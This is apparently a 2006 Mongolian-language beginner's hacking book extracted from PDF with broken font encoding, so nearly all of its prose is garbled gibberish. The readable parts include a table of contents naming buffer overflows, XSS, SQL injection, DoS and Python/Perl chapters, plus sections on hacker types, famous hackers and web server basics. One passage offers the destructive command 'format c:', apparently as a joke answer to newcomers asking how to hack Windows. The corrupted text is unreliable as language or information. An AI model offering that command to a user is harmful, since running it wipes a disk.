01Omya XAPFAR- XAKEP -Xsuacau: Fauaa:ap BNBABOPX HsMxvv NOHX-3PB3H3 3opnr: FAHBATYnaaaaa1ap xo1 2006 oa2Uaacub xaMxaa: Xaanannu xyyaac: Ypnax apaaM" Xaanannu koMnauna xaanaa.Powered by ht t p: / / www.j argal.mn3oxnorunu apx xyynnap xaMraanaracau onuo. 20063XspxsaasxyypacxaxepppararMspsxrvawsaw xaMraanax 1yxa opoop u xspsrrv asss...45- Yamarupap xaapaw xsnsx vr -Taauaxvv uoMuooc sax aa xakepaaarnr Maacauaap eepnu xncau aaxyyacaaxapxauxakepayynaxaacxaMraanxonox:yxacypax onoMx:okM.Baxakepaax:yxaMaanaronrauuxauuoMoua ar:axaaprv nx nnaa.Taub yumnx y uoM Mnun auxub v:aan :yn anacau ouocou svnc uanaaa araar yyunnx epmeex ax xaMaau uaaax aua.NnunonxMaacauaapnxauxuoMsoxnorunanucauuoMuoocoo MeureuamnronaorrvereeaycaaamnuaMaanarMaaaananerexrax eepnuuarsaaaaxapnaxrvsopnynaarnnaa.BycabunucauuoMbr vuarvraapycaaa:apaax,nu:epua:aaapnyyncau:oxnonaonauoM soxnorunaxaanvvncauuoMooopnyynxuaaaxrvaxvpuynMaapaapaa aapaarnuv:aanaarapraxaacauxvvrnuxauvvaaan:a:ynrapaar :yn apxaM :a xomna vvunr onrox, xvuaa:rau vsaxnr xvcax aua.3uauoMusaaxyyaacxapxauxakepaax,:vvuaacxapxauxaMraanax :anaap auxau onou ayua ma:ub Maanar:a xvua sopnyncau uoM onuo. KoMnsk:epnuakcnep:vvanuxyasaxa:aurnucauaraaxonoxkM. Xapnu koMnsk:epnu :anaap or: Maanarrv xvu vvunr yumaaa sMap uar kM onrouo rax n oaoxrv aua.NnunuaaausaauaMxa:racauauaxvvv:aannr:aanauonroox copxouoyy.Yumnru:aauauoM:oxonoo:osMapuarauMaaaanan, cauanxvcan:aajargal_oyun@yahoo.dexasraapnpvvnann:ynbunx asp:a ax onuo.6- Tanapxan -XaMrnu :vpvvua aux auaxvv uoMbr nunxaa ypaM sopnreru, ca:ran cauaaraapaaMxcauauauasuap:aaaspnanaa.HoMnunxsauaa vpranx:ycanxaaMxnxacaurapnuxauaaaaspnacauca:ranaaaua uoMoop aaMxyynau xvprax aua. 3uaxvv uoMbr nunx sauaa vua:a seaneree erceu Nou Aa" XXK-bu ansauepC.Bascranau,K:NC-uarmBok:opU.Faua:,K:NC-uaxnax uoMbu cauu B. Ouepxapran, onou aua uas N. Tvamnu:erc, B. Coaasp, uap: aspnacau :anapxcauaa nnapxnnse.Neu aua uoMbr xyaanaau aau eep:ee ara u a:yra Maanar uaMax rax araa :aua aspnanaa.7FapuarOpman ................................ ................................ .......................... 11Bvnar 1. Xaxepyypma 1yxa onron1 ................................ ..........13Xakep rax xau a? ................................ ........................15Xakepyyabu aurnnan................................ ....................17Kpakep rax xau a? ................................ ......................18Xakepbu Maanar................................ ...........................18Lnnaar 10 xakepaan: ................................ ...................21Bvnar 2. Bs cepaepaa v1su ................................ ....................23Ba cepaep ................................ ................................ ...25Ba paysep................................ ................................ .28Firewall................................ ................................ ........29HTTP................................ ................................ ............29HTTPS................................ ................................ ..........30!P xasr................................ ................................ .........30DNS................................ ................................ .............31TCP................................ ................................ ..............32FTP................................ ................................ ..............32Tenue:................................ ................................ .........33Encrypt ion................................ ................................ ....34I nt rusion Det ect ionSyst em ................................ ............37Finger................................ ................................ ..........38SSH................................ ................................ ..............39SMTP................................ ................................ ...........39POP3................................ ................................ ............39NNTP................................ ................................ ...........40SNMP................................ ................................ ...........40ARP................................ ................................ ..............40I CMP................................ ................................ ............40DHCP................................ ................................ ...........40SSL................................ ................................ ..............41TFTP................................ ................................ ............41Root kit ................................ ................................ .........41Vulnerabilit ies, Threat s, Count ermeasures......................428Bvnar 3. Bs xaxeppax ................................ ................................ .45Ba xakepaax vuaac ................................ ......................47 XaMrnu nx xananaraa ep:aer uvx................................53XaMrnu nx xananaraa ep:aer nop:yya.........................54Cepaep connx apra................................ .......................54Buf fer Overf lows................................ ...........................55Format String anaaa ................................ ......................56Ba xyyaacuaac uaa:pax apx xax................................ .57UN!X cnc:eMnu uyyu vr :anax................................ ...60Social engineering................................ .........................62 Phishing................................ ................................ .......631opMbu uyyu :anap................................ ...................66Samba amnrnax exploitxnx................................ ........66Net BI OSNULL session................................ ...................69HTTP xapnyn: eepunex ................................ .................71DoS aapan:................................ ................................73Googlehack................................ ................................ ..79Cross Sit e Script ing (XSS)................................ ..............83SQL inj ect ion................................ ................................86OS inj ect ion................................ ................................ ..86HTTP post SOL query uapyynax ................................ ...87Yahoo XSS worm ................................ ..........................91Bvnar +. Pyt hon xsn ................................ ................................ ......95Python xanun :yxa................................ ....................97Yuacau xacar................................ ................................97Onepa:opyya ................................ ................................99Hexuen manrax !F vnaan ................................ .............101Hexuen: aaa:an: while vnaan................................ .....102For aaa:an: ................................ ................................ ..102Break vnaan ................................ ................................103Cont inue vnaan................................ ...........................1031yuku................................ ................................ ..........104Noayns................................ ................................ ........107Orerannu v:au ................................ ..........................108Xnmaa nporpaM................................ ...........................101Oek: xauaan:a: nporpaMunan................................ ...111YaaMmnn ................................ ................................ ......112Opon: rapan:................................ ...............................1139Bvnar 5. Perlxsn ................................ ................................ ...........115Perl xanun :yxa ................................ .........................117Orerannu :epen................................ ......................... 117Onepa:opyya ................................ ................................120Baa:an:................................ ................................ .......1251anbu opon: rapan:................................ ..................126Labels................................ ................................ ..........128Subrout ine ................................ ................................ ....129Pat t ern mat ching................................ .......................... 130Noayns................................ ................................ ........132Oek: ................................ ................................ .........135Orerannu cau................................ .............................137Xaacpan1 ................................ ................................ ...................... 141Hop:yya................................ ................................ ........143Xakepbu nporpaM (t ools)................................ ..............151Nouron yncbu apvvrnu xyynnac................................ ..155Amnrnacau Ma:epnan................................ ...................157Torcron ................................ ................................ ........................1591011- Opman -BnaauaxaaapNouronyncaanu:epua:auxuaa:apcun10xnnnu or cnon :erenaep :aMaarnau eurepvvnnaa. UaxnM Nouron onou ycaa onouxe:enepxaparxcauaapuarveaoaaonkoMnsk:ep,nu:epua:nu au :ycbr onrox Maaaar xvu onou onx araa us aspnyym:a. Yvu:a saparuaunu:epua:,:apayuaaaMaaaannnu:exuonornuakynrv aanbu:anaapspnxaaceepaprarvereea,aua:anaaap:oaopxo aryynnara xvMvvc spsx xanx onou axnn xnx araa onoau vp avua xvpu araa us cauacuaac ueexeu aua.BvxkoMnaun,aryynnaryyabraaxyyaac:aonrox:yxaspsx axancuaac xom eapeec eaep: onou aa xyyaac mnuaap uaMaraax araa uscauu,xncauaanuxaaakynrvaaanonouansau:anaaap auxaapyym:a onooa aua. Nouronyncaaaaxnaaronoucauc:yan,xyanapaaaaxnaar onou aa ansauepyya aaar onoau xaM:apu uaraax axnnnax :an aaap Myyavu aacaap n aua. Ba xyyaac xnxnu :yna aa nporpaMnc:, aa ansauep,aunMemuxnruraxMa:onouxvunxaM:buv:aanax c:oonoauNouronavranrusuarxvuxnunxaarusannaaaxvu :yxauuarunrnanaaaMapramnxaauscaaaonxaxmnr.3caan Nouronuyyabu vranr uaaaaryunaepcans uauap:a xonoo:o ax uonox kM.Oaooroop aaansauepyyabuun:narapxamrnrxaMraanaar aryynnarauaruaxrvonon:o.NnunneBaBnsauepyyabu Xonoo"rarunraryynaxcauaarcvvnnuxaaauxnnao:poo:aacaap araa nnaa. 3apnMxvMvvcuaMaraaxakepaax:yxauoMrapraxycaaa xopno:oMaaaananuaunaaraxxanxMaraarvnkM.Taraannxapnya us 3ua on xopno:o Maaaanan nmaa, aua on xvu vxun Maaax c:o svnckM.XapnuauaMaanaraacausvnasopnynaxyy,Myysvna sopnynax yy raaar us :yxau xyas xvun acyyaan." rax xanua. AMepnknu uaracauyncaa12-1+uacubxvvxavvanMMaanarnraaunxcauaaar. Yunpusraaan:aaaua:epenxxanaaapyumnxMa:epnanusxauran::a nx aaar:a xonoo:o. 12Ta vxau eMue us Maaaannnu xaparcnvvaaap 12 uac:a xvvxaa AHY-uuarauauknrxakepaaxeepnuaaucauaxaaaucasaonnapxnraaa apnracaubrcoucoxacauax.OnouxvMvvc:apxvvxanrPAF" xaMaau:ooucouusnaa:a.Faau:apxvvxanuPAF"raxaacnnvvonx aaaar Maaaanan naunxaac eep araar xapyynx aua. Taraan:nMMaanar:axvvxavvauarneaepuarausaparNouron yncbu akynrv aanbu cnc:eM pyy xanaaan sax aa? Bna :vvunr PAF" xvvxavva xncau raaa cyyx ax yy???Harau:nNouronyncycaayncopuoocMaaaannnu:exuonornop xoupoxrvraxoaoxaraaoncauMyyvxnnsvncnr:aauaacay:axrvcypuMaacauaxmaapanara:ans.Tvpvvuaypacau:ap12 uac:axvvxaaAHY-unmNouronyncbuuaraukpyyxanacauon apnraax acau onoa yy? OaooMaua10xnnnuxvvxavvaayuacauaaxnaarxvvxavva aua.3apnMusMaraarvauauoMbrxvvxanuuoM"raxxanaxaap euaep Maanar:a araa ax. TnMaac na xou npaaavuxaa Maanarnr ycaa opub xvvxavvanu Maanaraac xoupoox onoxrv aa.Faxaaa auaaac us 10 xnnnu xvvxavvaaa sopnyncau uoM rax onrox onoxrv.3uauoMvxuacubxauasopnyncauereeanpaaavu koMnsk:epnu syyu xvnaax axaa na anau axrv on onoxrv.Neu vvunr yumaaa :a Nouron yncbr Xakeprv rax oaox onoxrv mvv.NouronyncMaausaanxnaaauc:axaaauXakep:aereea,Mam cauMapramcauCnc:eMnuAaMnuyyauonouaraa.3araapCau" xaMaax anapbr xvp:ax uaaaxyu onou Cnc:eMnu AaMnu uaMaxaa ara u a:yra :yc uaMap onox ax xaMaauauaxvv uoMbr nunaa.136vnsr 1Xakepyyabu :yxa onron: I fyouknowt heenemyandknowyourself,you neednot feart he resultof a hundred bat t les- Sun Tzu1415- Xaxep rsw xsa s? -XakepyyaonkoMnsk:epnucnc:eMaaxanaaa,uyyunannr counpxou cyaanaar xvMvvc kM. Tvvunr nnvv caxpyynx xaMraanax apra saMbrvpranxapanxnnaxayp:aaaar.XakepyyaHu:epua:nr eprexvvnx,UNI Xvnannucnc:eMnroaoonaunxaparnaxaraa xvp:an xerxvvncau kM.Heree:anaapaaa(cnc:eMa)seameepenrvuaa:paxnrxakepaax raxonroxonuo.OnouxvMvvcXakepyyabrcauxvMvvcKpakepyyabr MyyxvMvvcraxonroaorus:amaaonron:kM.XakepyyasapnMaaa kpakepyyaaacaa u nnvv Myy svnnr xnx us anar aaar. araaa raaan MaanarnuxyasaXakepyyausxasaaaKpakepyyaaacnnvvereeaxapaa uarau: n nnvv Maanar:a kM unus :ap Maanaraa Myy svna sapaan saxbr :a onrox araa ax. Xapnu Kpakepyya on xasaaa Myy xvMvvc aaar rax onroxoa uar nx ypyyaaxrv aa.HoMbuuvvpauaaaparaasyprbrxapcauax,kyonoxbrus:a Maaaxvv?Linuxnnuranunsypar:aaMneM:aaaaron,FreeBSD ue:repnusyparvxnaMneM:aaaar.TaraanXakepyyaaaaMneM n ky? 3uaaMneMnr2003oub10capaacxaparnaxaxancau.3ua:aua aoopxavpcvvanr:aascauaaan,:aXakepyyabuaMneMraxonrox xapar:aonoxus.XapnuxauuarunkoMnsk:epnrXakepaunxaaa aoopxaMneMnr:aanxbrxopnrnoaor.Kpakepyyaaasopnynaarvracau vr n aaa. Xapaa aua aMneMnr amnrnax on aapaax ca:aac myya aaaaa xaparnax onuo. ht t p: / / www.cat b.org/ hacker-emblem/ glider.png3urnu:ekc:xanapaapnunx:oxnonaonaaoopxaanyyaaap nuaar.| _| 0| _| [ ] [ * ] [] [] [ 0] [ ] 0 10| _| _| 0| [ ] [ ] [ * ] [] [ ] [ 0] 00 1| 0| 0| 0| [ * ] [ * ] [ * ] [ 0] [ 0] [ 0] 11 1Xakepbrsax:aunxaa?XaMrnucauXakepxaua?raxxvMvvc aauaaanacyyaar.NnunoanoopxaMrnuCau"Cnc:eMnuAaMnu on XaMrnu Cau" Xakep. araaa raaan Cnc:eMnu AaMnuyya eepcanu xncau kMaa xakepayynaxrvu :yna eepee eepnuxee cnc:eMnu anaaar xaaar.TarcaaparaaaCau"xakeponunxaor.FaxaaaycaaxvMvvc Cau" Xakep rax spsaarrv ereea Elite Hacker" rax uapnax saumxaa. 16ax"3nn:Xakep"onoxaa?racauacyyn:auanaapaaxmvnrnr sopnyns.To f ollow t he pat h:Look t o t he mast er,follow t he mast er,walk wit h t he mast er,see t hrough t he mast er,become t he mast er. 3uamvnrnrncauaa:araapopuyynanrv:aascauereeaxapaa Xakeponnraxoaoxaraa onAurnnxanunMaanarJavanporpaMunanbu xanun Maanaraac nnvv uyxan raarnr xanax racau kM.NeuXakepyyabuaMneMaacraauaXakepbuarvpeepnunoro sypar:aaaar.BaxakepaaaaaapaauseepnuaMneMaa:aascuaap xauxakepacaubrus:ausx,:vvunpe:nurecexonuo.Onnoo.NHraaar ca:brMaaaxrvNouronxvuaxrvraxoaoxaua,:vvunr XakepacauTypkbuareepcanunorosypraavnaaacauacubrus counpxyyns.3aaaannorosyparuran:rvrapbuvcarykysMapuar :aunx :aMarnr :or:Mon vnaaaaar Xakepyya aaar.17Xvuaxnaaaaaaaxcypaar,aapaaussacaxcypaar"racauuarvr aaar.Banrxakepaaxraxaraaxvuaoa:onrooubrauunapra Maaaaraxaaxauran::aonxapnuaaaaxakepayynaxaacxaMraanx araaxvuvxaprbrMaaaaraxxapar:aaaar.HMaacCau" Cnc:eMnu AaMnunc:pa:op onoxoa xap nx xeaenMep opox us xaparaax araa ax.Bn:rn mau:paapa, n:rn sanxyypaapa!- Xaxepyypma aaranan -Xakepyyabr ao:op us Uaraau Xakep (White hat), Caapan Xakep(Grey), XapXakep(Blackhat)rax3aurnnaarereeasaraaanuraxaurnnax oncubr :anapnas.UaraaaXaxep:Caucauaa:xakepraxonroxonuo.Xapaa UaraauXakepaaaac(cnc:eMaac)sMapuaranaaaykyuvxononaua :yxaraa:yxauaanuAaMnuausMaaaraaxsacyynaxykyeepee sacaxaprbrusxanxeraer.UaraauXakepyyausXapXakepyya:asr aannxaunporpaMxaparnaxonoau:aadanbryc:rax,sMapuar Maaaanan xynranax sopnnroop amnrnaaarrv.XapXaxep:Hapuaacusxapaaan:amyyaonroxaraaax. ToauxouaooonUaraauXakepbusracparus.XvunkMauauaa:apu opooa yc:rax, syraaraa raprax saaar xvMvvc.CaapanXaxep:Baapxxopoocansannubxusmnuxuauapbr aryyncauxvMvvc.Xaasayc:raaanxaasasacaaan.HxauxXakepyyaaua :epena opaor.Newbi e: Xapaa:aaeurexmnuaapcypuaxanxaraaon:auaaua uapnr erex us aaa.Baap us ac uar Xakepbu :epen aaar us Script Kiddies ykyScriptWeenieskM.3araapusxakepaax:anaapsMapuMaanarrvaxonox ereea Xakepyyabu xncau anau nporpaMyyabr (tools) amnrnaaa eepee u Maaanrv xakepaunx :oxnonaon aaar. 18- Kpaxep rsw xsa s? -Kpakepyya(Cracker)on XakepbuMaanaraaMyysvnaxaparnaxycabukoMnsk:ep:uaa:pax,yc:raxacaancvnxaarxop:Myycauaaub vvauaac amnrnaaar xvMvvc kM. Faxaaa Nouron yncbu uexuena oaooroop Kpakepyya ysu onx aua. araaa raaan Nouronuyya naaua Nicrosoft Office,NicrosoftWindowsXPsaparnporpaMbropnruanxyannapbr xyaanaax aaax Meure axrv yupaac, 1 CDnunx vua yky 1500-3000 :erpereeponxaaaxaa:yconxaraakM.Xnmaaus:AutoCAD nporpaM aux rapaxaaa 2000 $ acau. Bna 2000 aonnapaap uar CD xasaa uaauxvupaxrv,:araaaMeurexvpaxrvkMunusraaaAutoCAD nporpaMbrxaparnaxrvan:anmaaa.HMaveanuereeKpakepyya :yc onx araa kM n aaa. Xaan:yconxaraauKpakepyyaonMyyxvMvvckM.Xvun xncau v:aannr vuauauarv onroaor, soxnorunu apxnr xaMrnu nx sepuaerxvMvvc.HMaNouronbunporpaMnc:yyabuxncauv:aannr n:rn n kpakaax vsaapa. Yrnu Nouronuyya vua:a nporpaM xyaanaaxaaucypaarvxvMvvcyupaacxnuxauavuaapusoaoonxyaanaaxaau cypaxxapar:aaua. YrvonuereeNouronyncbuNaaaannnu :exuonornu npaaav rax Msura spnaa u uaMaprv mvv.Aux Speaker koMnaun rapracau Auryyu" nporpaMbr /0 Msura opunM :erpereepsapaxaasMapvua:akMaraaaonouxvMvvcyxnMaax xvnaax aacau. HporpaM xnxaa xnuuaau nx xvu xeaenMep, Meure oparnr Maaaxrvraacn:ap.OaooxvMvvcnuca:ranraaapanaaaponcoumnr cauaraax aua.- Xaxepma Mspnsr -3uauoMouaaaxyyacbrsMapapraap,xapxauxakepaaar:yxa :vvuaac xapxau xaMraanx onox :yxa aurnuaap :anapnaxbr sopscou onuo.3araapapryyabu:yxauapnaunausaaxrvereeaseaxeuky aa?raarnrusn:anapnaaaopxnxonuo.Xakeponoxoopcypuaxnaxaauacubxssraapraxaxrvereea:aubaassac,xeaenMep xopooc unus ron us man:raanua. Nam onou :epnnu nporpaMyya (tools) aaar ereea aaraapnr aux cnc:eMnuxaaanaaarxsuaxsopnnro:ov:aaaaraannaaakMbrcau Myyrnu annuaap us u amnrnax onarnu :oa xnmaa kM. 19FaxaaaycaaxvunnucauanaunporpaMamnrnaxaraaxvu:ap nporpaMbrnucauxvuaacsMar:uaronouuanaaaanxMbuxouosaaarraarnrcauaxxapar:a.HMaao:opuskyonooaaraarcauMaaax aaan npaaava uaMa eep: unus n xapar onuo.Xakep onoxbu :yna aapaax svncnr sanmrv Maaaar ax c:o. 1. Xapaa sMap uar nporpaMunanbu xan Maaaxrv on Python xanuaac axnaxxapar:a.BapaarnucypaxxanonConouC++xan, Pythonxanuaacnnvvuaaaapnarereeacypaxaaurarv.3ua onseaxeuvuacaumanryypereeaxapaacauxakepon raaannporpaMunanbuonouxanMaaaaraxxapar:a.Caooa :vamunyupaacuaauaasrkyxnraaaaraausxaparaaar. XapnuJavaaaapuaauaakyonooaaraausuMaaaraaarrv. Heeuenceu saraa xvp:an yc:racau vrv us Maaaraaarrv xan mvv aaa.FaxaaanporpaMnunxaannvvxypaauyupaaccypaxaa nnvvaaxrv.C/C++xannrcauMaaaarxvuaonaaraap xanuvvanrcypaxaaxaaxouornunaxnnonoxax.Neu Xakepyyabu cypax uar xan on L!SP nporpaMunanbu xan kM. 2. UNI Xvnannucnc:eMnuvuaac.EpusonWindows,LinuxxopbruarsaparkoMnsk:epaaapaacyynraaacypanuaaaa. Neu Linux xaparnaruanu xonoo aua :apa ancaan vp u svraap.3. Bac uar cypax c:o xan araa, raxaaa nporpaMunanbu xan nm mvv. Onouyncbu xan English. Faxaaa Opoc kMyy FepMau xanun ansuarnrMaaaaraxaasvraap.3araapxanaaapXakepbu :yxa uoM, dopyMyya seuaee araa.4. TCP/ I P sax axnnarnr Maaaar ax sanmrv maapanara:a.5. Hu:epua:nuvuaac,:vvuaaapxsusvpnuvnunnraauvva.(DNS, FTP, HTTP, SSH,Telnetrax Ma:)6. XaMraanan:bu:anaapxarasaparMaanar.(Firewall,Proxies, Packetfilter rax Ma:)7. XaMrnu cvvnunu xapar:a svn on Xakepbu ca:raxv.XaasauarUnderground WarezForum-yyaaapsounnxaraapa. Ournpoocarcyyxvuonnr:oXakeponaorrv."rax3nn:Xakepyya 20xanaar kM aua naa. Xvun auxaapan xasaa u n:rn :a:ax a racau vr ax onox kM. nvuaxaapcauXakeponoxoopmnacauonaapaaxsvncnr Maaaxxapar:a:visualBasic8visualBasic.NET,vBScript,ASP,ActiveX nporpaMunan,OCXaDLLkou:pon,HTNL(aasaxxnaar:yxa), JavaScript, PERL, Batch nporpaM (DOS opuub nporpaM), PHP, Shell Script. BaceepnuracauRemoteAdminTools(RATs)xapar:a.Neunop:xasr, I P-r Maaaar onoxxapar:a. Proxycypaxxapar:a, sax anonymous ax :yxa.FTP,Telnet,encryption,xop:bu:oonnbucnc:eM,apaau sypraa:bu:oonnbucnc:eM,ASC!!,Unicode,Xam-nu:yxakyua,sax amnrnaaar :yxa.Pyt hon,Perlxanun:yxaauauoMouavsaxonuo.XapnuJava, C/ C+ + xanun :yxa Nouron xan aaapx uoM aaar ereea :ap uoMyyabr onx cypanuaapa.3ua uoMbr yumnx ayycaaa :a vuaxaap Xakep onoxoop mnacau on uaMxraaaaaxanaaapxMa:epnanyyabr onxyumnxxapar:a.Xapaa:a MeureunonoMx:oonCertifiedEthicalHackerraxMa:cypran:aua cypanuax ac onox kM. Whit eHat onox us BlackHat onoxoocoo apa xauvvuaxonoxkM.TnMaacBlackHat ,Whit eHat xopsaMbuans us onox mnaaapaa cau oaox ax xnraapa.Xakepyya vpranx Windowscnc:eMnr roounnx aaar. araaa raarnr ypxau n Maaax ax. 3ua :yxa uar nM ounroo aaar kM.Har xvu ypxuaac kM acyyx n aaa. - BnWindowsxaparnaaarkMaa,ra:anuarkMonoxrvaxmnr aua, :a uaaaa vvunr apranaar uar vr saax ereeu? rax n aaa.Bypxau xapnya us:- formatc: " 3ua vx acyyanbr unus soxnuyynua.21- Uanpsr 10 xaxeppan1 -Tvvxauuarxyrauaaub:ypmnaxakepyyabuxncauaxnyyaaac xaMrnu mnnaar oncou apabr us :aunnuyynx aua.1990oubveaXakepyyabuauaruraxsapnMaaaxanaraaarKevin NitnickaanxnumnnaarxapnnuaaxonooubkoMnaunyaonox Nokia, Fuj it su,Mot orola,SunMicrosyst ems-nucnc:eMnraaacau.Tapaap1995 ouaXonooubMepaex:oauoo( FBI ) -aapnraaaa2000oua xyrauaauaacaaeMuecynnaracau.Faxaaa:apeepnreeXakeprax uapnaxnr xvcax acaurv. GaryMcKinnonAMepnknuuaprnuuyyuMaaaananvxn90rapy koMnsk:epnvvxanacauxapraap2002oub11capaHxBpn:auna apnaunaracau. Tvvxaua xaMrnu :oM uaprnu koMnsk:epnu Xakep rax nunracau xvu.1995OpocbukoMnsk:epnuakcnep:BnaanMnpPeanuxaMrnuaux ounauaapaukaaapaMacauxvukM.Cit ibank-aac10casaonnap xynrancauonoauI nt erpol:vvunrAHY,1nunaua,Fonnaua,FepMau, HspannspyyMeureemnnxvvncunaapaaHxBpn:aunacapnaunncau. OaooauknrounauaapaaapaMaax"xaparonourapaaronoausr Meureerapaaapaaaaaxveaaanxauxusapnraaarraxspsaaronoau apnraaarv xvu xaa u araa kM nnaa, xau Maanaa.1990 oua Poc Auxenocbu paano c:auuaac uarau ypanaaau sapnaxaa. r102aaxssanracauxvuauoomnuaPorsche944S2 erueracauaua. Fa:anKevinPoulsenxo:bu:enedouspnaubcnc:eMnrrap:aaaaaaa, eepee102aaxsoponuoruonxopooamaruanbraauaa.Tapaap:yxau ouaoo apnraaaa 3 xnn mopoua cyyxaa.1983ouaeueexKevinPoulsenMaauscyparuaxaaauvxonx, nu:epua:aac ApnaHe:nr xakepaxaa.AMepnknuXakepTimothyLloydOmegaEngineeriingkoMnaun koMnsk:epnucvnxaauaeepnuxnxnrnporpaMaacyynraxaa.TapveaOmegaEngineeriingNasa onou AMepnknu :aurncnu uaprnu epeuxn xauraruacau.TapnporpaMlogicbomb"acauereeasr:apvea axnnnaxacauOmega-rnuvxaxnnnaxacaunporpaMbryc:rax 10 cas aonnapbu xoxnpon yupyynxaa.221988oua23uac:aRobert Morrisauxubnu:epua:e:nraanxna :apaaxaa.99MepnporpaMusnu:epua:aa:aascau:ypmnn:acau onoau uaamaaraa ycabu koMnsk:ep: xanaax axanxaa.1999ouaMeliissaanpycus aanxnaaxnua+00casaonnapbu xoxnponyupyyncaukM.XaMrnunxxoxnponyupyyncauanpycnrDavid Smit h nucau ereea :apaap 5 xnnnu sn aacau aua.2000oub2capbu6onouBaneu:nubaspaapNafiaboyaanxnu :oMooxou aa ca: onoxeBay,Amazon, Yahoo, CNNraxMa:ca:yyabr DenialofServiceapraapxakepaax1,/:apyMaonnapbuxoxnpon yupyynxaa. 3ua aprbu :yxa aapaarnu vnrvvaaapaa vsax onuo. Xnuxaua uapnr us un:aa sapnaarv ereea yunp us :ap 15 uac:a acau aua. Tap 2000 ouaoo apnracau. 2005 oub 9 capbu 21-c :apaap Nou:peanbucounuanu:epua:nuakynrvaanbu:anaapun:anaarca:rvvnuaap opcou aua. 1993ou.Taaunrxyypan:buMac:epraaarereeaaapaxaus AMepeknuy:acubcnc:eMacau.TaaYuaacunAkynrvaanbu ana, AT&T, AMepnknu auk rax Ma: aryynnarbr xakepacau. 23- 6vnsr 2 -Ba cepaepnu v:au I fyouwant t ost ophackersfrominvadingyournet work,firstyouve gott o invade t heir minds.2425- Bs cepaep -3urnuaap:oaopxonxxanan:Xaparnarunuaaxyyaacvsax uexuennrxauraaarnporpaMakoMnsk:epnrusaacepaepraua. XaMrnuepreuamnrnaraaarcepaeponApache,!!Syky!nternet !nformationServeruapkM.XapaMcan:aussMapuaacepaepxanaax onoxyu onou uvx:a aaar. 2006 oub 10 capbu aanaap 970,932,447naaax:a cepaep aua racaucyaanraarapuaa,auauseMuexcapbuxaac1,08casapuaMaracau aua vsvvnan: kM aua. Ans cepaep xaMrnu nxamnrnaraax araar xapsuyynx xaps.BacepaepnueueeapnunponeMon:vvunonoususbu vnunnraa vsvvnaar uaaaap:a xonoo:o, vvunr aaraaa :vvua uaa:pax onoMx us euaepcaer. Ba cepaep: uaa:pax apx us aurnnaracau aaar.Cepaepnr amnrnaxaa :oxnpoMx:o acaxnr manraaar, Meu :vvuunau susvpnu counpxon:o Maaaanan yky dan apaar Mam onou xaparcan aaar.TvvunuarusWhiskerkM.Whisker-nuxaMrnucvvnnu xyannapon1.+xyannapkM.Whiskeronaacepaepnuyxaanar manran: xnaar PERL xan aaap nunracau koa kM. Whisker-nu xaMrnu uyxan ouunor on :ap aMapxau raM:aar "database" xaparnaaar.Annnnkemu cepaep (applicat ionserver)us xaparnaruaaa ererannr eepaaapaaonoacpyynxxapyynaxsopnnro:o.Xnmaaus:PHPus Apachecepaepaaap,ASP.NETus!!Scepaepaaapaxnnnaua.3uaknep raM:xaprnu/0-nraaannnnkemuxanaan:asanarnrauxaapax xapar:a.26Orerannucauussusvpnuererannreepaaapaaxaaranax sopnnro:o aaar. NySOL, Oracle, NS-SOL rax Ma: aaar. Baxyyacbrvsaxaraa:anbrknneu:(client)raaar.Cepaepon aanrvsvvnxaraa:ankM.Neuaaxyyacbrnucauxanyky ckpnn:nrao:opusknneu::anacepaep:anraxxopxyaaaaar. Knneu::anbuckpnn:onaavsaxaraakoMnsk:epaaapaamyya onoacpyynaraaar.Yvunxnmaaus:JavaScript,vBScript,ActiveXkM. Xapnucepaep:anbuckpnn:onaacepaepkoMnsk:epaaapaakoaus onoacpyynaraaaa vp avur us xaparnaruna nnraaaar. Xnmaa us: Perl, ASP (Active Server Pages), PHP, ColdFusion, JSP(Java Server Pages) rax Ma:.XaMrnu cvvnnu venu aua cyaanraaub vpavur xapaaa xvu onrou raxaxaraaax,ra:anacauacyaanraarxncauxvMvvcacauavp avuraaxapaaanauaacay:yyrvraxcauaua.BnaeMueusPHPaaap xnracau aa xyyaac xaMrnu onou rax oaaor acau nnaa. Faau oaoo :nMnmonxaa.araaanMvpavuaxvpcunruapnaunaucyanaaa vsaxaa xyanu aa ca:yya ronayy PHP aaap nunracau araa on, :oM xnxnronouaryynnaryyabuca:ronayyASP:exuonornramnrnacau aua.naurysacvvnnuveaASP.NET-nuxaparnaaxypaau:araap ecex araar xapx onuo. naurysa onou xaparnaru:a :oM :oM ca:yya 27vraASPXepre:ren:aaraar:aausaapcauax. Naraarvauaecen: ASP.NET-nu xaMraanan: cau araa:a xonoo:o ax.3xnaaaaaxyyaacsaxaxnnnaaarnpoueccbraauvsse.Bacnc:eM usaaxaparnaru(webbrowser),aacepaep,onouannnnkemuyyabraxnyynaxannnnkemucepaep,ererannucaurnucepaepraxaepaeu vpanaaxvvuaac:or:ouo.Bapaaxsypraacxapxauxoopouaoosoxnuox axnnnaarnr us xapx onuo. URLusaaannnnkemu:axapnnuauaxnnnaxaaaaacepaep xaparnarunukoMnsk:epxopbuxoopouaaapaaxxanap:araap aaMxyynaar. OMuex sypar:a URL-aa xapsuyynx xaps. http:]] cepaep ] saM ] annnaxema ? xyabcaruyyp28Bacepaepauxcyynraxaanxauxnop:usuaan::aaaaronoxoop :vvunrmvvpaumauara:asvpnaxusun.HMaronxaparnaaar nop:oocycabrvranrxaaaar.Faxaaan:apuaan::axaaxaunop:oop us Xakepyya uaa:apu uaaaar: ron yunp us araa kM.Ba cepaep: auxuaac us cekyuaaa uarI P xasruaac xaaau xvcan: aaaa :anusnpxonoxbr:oxnpyynxeraer.2-60000xvp:anaxonox onoau auxaaru y:raapaa 500 - 1000 n aaar. Cepaep overload (xa: auaanaraax, rauax) onox xaa xaaau :oxnonaon aaar.BnasapnMaaaaavsaxaxaa500,502,503,50+anaaauyya nnapaar, aua on Overload oncuooc vvaax rapaar.- Xyrauaaub uar armnua Mam onou xvu uarau sapar :yxau aanr vsax. ( 1000- 1 cas) - DDoS aapan:bu vea- Worm ( e:) xa: nx bandwith naaan- Hu:epua: xonon: Myy aaan- HporpaMbuonou:exunknumnuaunan:xnxaaaanaaarapraxsapar onuo.Overload-a opoxrvu :yna:- Firewall-aa cau :oxnpyynax xapar:a- HTTP t raffic manager cyynrax mnaax ac onuo.- Bs paysep -Ba paysep (web browser) us nu:epua:aap asnax onoMxnr naaua onroaor.URLaaapeepnuvsaxnrxvccauaanuxaaxasrnrnunxaa paysepaacepaep:vsaxxvcan::aanua.Xapaa:yxauxyyaacaaan aacepaep:vvunrpaysepnvvnnraaua.Bavsaxaaunun:yxavx Maaaannnrcepaepnvvnnraaaar.YvuaI Pxasr,aapaysepbu aanrapaurv Maaaanan, eMue opcou 